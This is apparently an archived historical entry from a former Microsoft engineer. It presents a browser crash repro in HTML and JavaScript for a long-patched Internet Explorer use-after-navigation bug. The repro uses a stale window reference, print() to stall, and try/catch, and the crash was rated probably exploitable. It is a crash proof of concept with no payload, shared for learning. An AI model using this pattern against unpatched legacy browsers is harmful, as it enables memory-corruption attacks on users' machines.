Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.
This is a close variant of the same timing-based crash described in the earlier entry on the same date. The mechanism is identical: save a reference to window, navigate away, open a dialog to buy time, then call a method on the stale reference inside a try/catch. This copy was preserved separately in the archive, likely as a parallel documentation effort for the same underlying bug.
<!-- iframe.html (loaded inside the iFrame) -->
<script>
function crashMe()
{
    // Keep a reference to the current window object (implicit global, as in the original repro).
    pWindow = window;

    // Navigate the iframe away; the saved reference now points at a stale script context.
    location.href = "about:blank";

    // The print dialog blocks long enough for the navigation to complete.
    window.print();

    // Calling a method on the stale reference inside try/catch is what triggers the crash:
    // the exception is marshalled across the now-invalid script context.
    try
    {
        pWindow.showModalDialog();
    }
    catch (e) {}
}
</script>
<input type="button" onmouseover="crashMe()" value="mouseOver me to Crash!">

<!-- parent page -->
<iframe src="iframe.html" name="iFrame" width="400" height="80"></iframe>
The try/catch wrapper is what distinguishes the exploitable path from a benign exception. Without it, the engine recovers gracefully. With it, the exception propagation attempts to marshal the thrown object across the now-invalid script context, hitting the null pointer in ScriptSite::CheckCrossDomainScriptContext. The crash was rated PROBABLY_EXPLOITABLE.